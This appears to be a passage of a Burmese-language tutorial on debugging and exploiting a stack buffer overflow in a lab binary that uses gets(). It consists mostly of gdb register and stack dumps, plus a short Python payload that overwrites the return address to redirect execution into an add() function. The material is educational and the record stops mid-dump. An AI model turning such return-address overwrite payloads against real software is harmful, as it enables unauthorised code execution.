0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048441 <main+40>: leave
   0x8048442 <main+41>: lea    esp,[ecx-0x4]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048441        0x8048441 <main+40>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048441 in main ()
(gdb)
0xffffd66c:     0x48484848      0x49494949      0x4a4a4a4a      0x4b4b4b4b
0xffffd67c:     0xf7e31600      0x00000001      0xffffd714      0xffffd71c
0xffffd68c:     0x00000000      0x00000000      0x00000000      0xf7fc9000
0xffffd69c:     0xf7ffdc04      0xf7ffd000      0x00000000      0xf7fc9000
0xffffd6ac:     0xf7fc9000      0x00000000      0xc1bf2a5e      0xf839c44e
0xffffd6bc:     0x00000000      0x00000000      0x00000000      0x00000001
0xffffd6cc:     0x08048310      0x00000000      0xf7feeff0      0xf7fe9880
0xffffd6dc:     0xf7ffd000      0x00000001      0x08048310      0x00000000
=> 0x8048442 <main+41>: lea    esp,[ecx-0x4]
   0x8048445 <main+44>: ret
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd66c       0xffffd66c
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048442        0x8048442 <main+41>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048442 in main ()
(gdb)
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()
(gdb)
0xffffd654:     0x00000002      0x00000003      0x44444444      0x45454545
0xffffd664:     0xffffd654      0x47474747      0x48484848      0x49494949
0xffffd674:     0x4a4a4a4a      0x4b4b4b4b      0xf7e31600      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xc1bf2a5e      0xf839c44e      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x804840b <add>:     push   ebp
   0x804840c <add+1>:   mov    ebp,esp
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840b        0x804840b <add>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840b in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840c <add+1>:   mov    ebp,esp
   0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840c        0x804840c <add+1>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840c in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
   0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840e        0x804840e <add+3>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840e in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
   0x8048414 <add+9>:   mov    eax,DWORD PTR [ebp+0x8]
eax            0x44444444       1145324612
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048411        0x8048411 <add+6>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048411 in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x44444447      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048414 <add+9>:   mov    eax,DWORD PTR [ebp+0x8]
   0x8048417 <add+12>:  pop    ebp
eax            0x44444444       1145324612
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048414        0x8048414 <add+9>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048414 in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x44444447      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048417 <add+12>:  pop    ebp
   0x8048418 <add+13>:  ret
eax            0x44444447       1145324615
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048417        0x8048417 <add+12>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048417 in add ()
(gdb)
0xffffd654:     0x00000002      0x44444447      0x44444444      0x45454545
0xffffd664:     0xffffd654      0x47474747      0x48484848      0x49494949
0xffffd674:     0x4a4a4a4a      0x4b4b4b4b      0xf7e31600      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xc1bf2a5e      0xf839c44e      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x8048418 <add+13>:  ret
   0x8048419 <main>:    lea    ecx,[esp+0x4]
eax            0x44444447       1145324615
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048418        0x8048418 <add+13>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048418 in add ()

သြားျပီ ။ add function လဲေရာက္ေရာ

add DWORD PTR [ebp+0x8],eax

အဲ့မွာျပသနာတက္ျပန္တယ္။ add function အစကိုေသခ်ာျပန္ၾကည့္ၾကမယ္။

0xffffd654:     0x00000002      0x00000003      0x44444444      0x45454545
0xffffd664:     0xffffd654      0x00000000      0xf7e31637      0xf7fc9000
0xffffd674:     0xf7fc9000      0x00000000      0xf7e31637      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0x9afd0f00      0xa37be110      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x804840b <add>:     push   ebp
   0x804840c <add+1>:   mov    ebp,esp
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840b        0x804840b <add>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840b in add ()

push ebp တဲ့ add ကိုေရာက္ေရာက္ခ်င္း ၾကိုဆိုေနတယ္။ ebp = 0x0 ဆိုေတာ့

(gdb) ni
0xffffd650:     0x00000000      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0x9afd0f00      0xa37be110      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840c <add+1>:   mov    ebp,esp
   0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840c        0x804840c <add+1>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840c in add ()

သူ stack frame ေဆာက္ေနတာ mov ebp,esp

(gdb) ni
0xffffd650:     0x00000000      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0x9afd0f00      0xa37be110      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
   0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840e        0x804840e <add+3>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840e in add ()

ခုလုပ္မွာက ေပါင္းဖို႕အတြက္ param ေတြကိုကိုင္တြယ္ေတာ့မွာ ၊ ၾကည့္မယ္။ eax ထဲကို ebp+0xc ထဲက value ကိုထည့္မယ္။

(gdb) x/x $ebp+0xc
0xffffd65c:     0x44444444

wew ဒီလိုလား? သိပ္ဟုတ္တာေပါ့ က်ေနာ္ saved return pointer ကိုေမ့ေနတယ္ ။ ဒီမွာ ျပန္ၾကည့္ပါ

debugging with gdb part2 တုန္းကဟာေလးပါ ။ 0x08048433 က save return pointer ပဲ

(gdb) ni
0xffffd630:     0xffffd658      0x08048433      0x00000002      0x00000003
0xffffd640:     0x00000001      0xffffd704      0xffffd70c      0x08048481
0xffffd650:     0xf7fc93dc      0xffffd670      0x00000000      0xf7e31637
0xffffd660:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd670:     0x00000001      0xffffd704      0xffffd70c      0x00000000
0xffffd680:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd690:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6a0:     0x00000000      0x73741faf      0x4af311bf      0x00000000
=> 0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
   0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
   0xffffd630:  pop    eax
0x0804840e in add ()

ok ! new payload

import struct
addfunction=struct.pack("I",0x0804840b)
srp="AAAA"
firstparam=struct.pack("I",0x00000002)
secondparam=struct.pack("I",0x00000003)
offset="BBBB"
newesp=struct.pack("I",0xffffd650+0x4)

print addfunction+srp+firstparam+secondparam+offset+newesp

ျပန္ run လိုက္မယ္။

(gdb) r < rop.txt
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u < rop.txt
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()
(gdb) ni
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
=> 0x8048436 <main+29>: add    esp,0x10
   0x8048439 <main+32>: mov    eax,0x0
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048436        0x8048436 <main+29>
eflags         0x246    [ PF ZF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 3, 0x08048436 in main ()
(gdb)
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048439 <main+32>: mov    eax,0x0
   0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048439        0x8048439 <main+32>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048439 in main ()
(gdb)
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
   0x8048441 <main+40>: leave
eax            0x0      0
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804843e        0x804843e <main+37>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804843e in main ()
(gdb)
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048441 <main+40>: leave
   0x8048442 <main+41>: lea    esp,[ecx-0x4]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048441        0x8048441 <main+40>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048441 in main ()
(gdb)
0xffffd66c:     0xf7e31637      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd67c:     0xf7e31637      0x00000001      0xffffd714      0xffffd71c
0xffffd68c:     0x00000000      0x00000000      0x00000000      0xf7fc9000
0xffffd69c:     0xf7ffdc04      0xf7ffd000      0x00000000      0xf7fc9000
0xffffd6ac:     0xf7fc9000      0x00000000      0xfb2060b9      0xc2a68ea9
0xffffd6bc:     0x00000000      0x00000000      0x00000000      0x00000001
0xffffd6cc:     0x08048310      0x00000000      0xf7feeff0      0xf7fe9880
0xffffd6dc:     0xf7ffd000      0x00000001      0x08048310      0x00000000
=> 0x8048442 <main+41>: lea    esp,[ecx-0x4]
   0x8048445 <main+44>: ret
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd66c       0xffffd66c
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048442        0x8048442 <main+41>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048442 in main ()
(gdb)
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()
(gdb)
0xffffd654:     0x41414141      0x00000002      0x00000003      0x42424242
0xffffd664:     0xffffd654      0x00000000      0xf7e31637      0xf7fc9000
0xffffd674:     0xf7fc9000      0x00000000      0xf7e31637      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xfb2060b9      0xc2a68ea9      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x804840b <add>:     push   ebp
   0x804840c <add+1>:   mov    ebp,esp
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840b        0x804840b <add>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840b in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840c <add+1>:   mov    ebp,esp
   0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840c        0x804840c <add+1>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840c in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
   0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840e        0x804840e <add+3>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840e in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
   0x8048414 <add+9>:   mov    eax,DWORD PTR [ebp+0x8]
eax            0x3      3
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
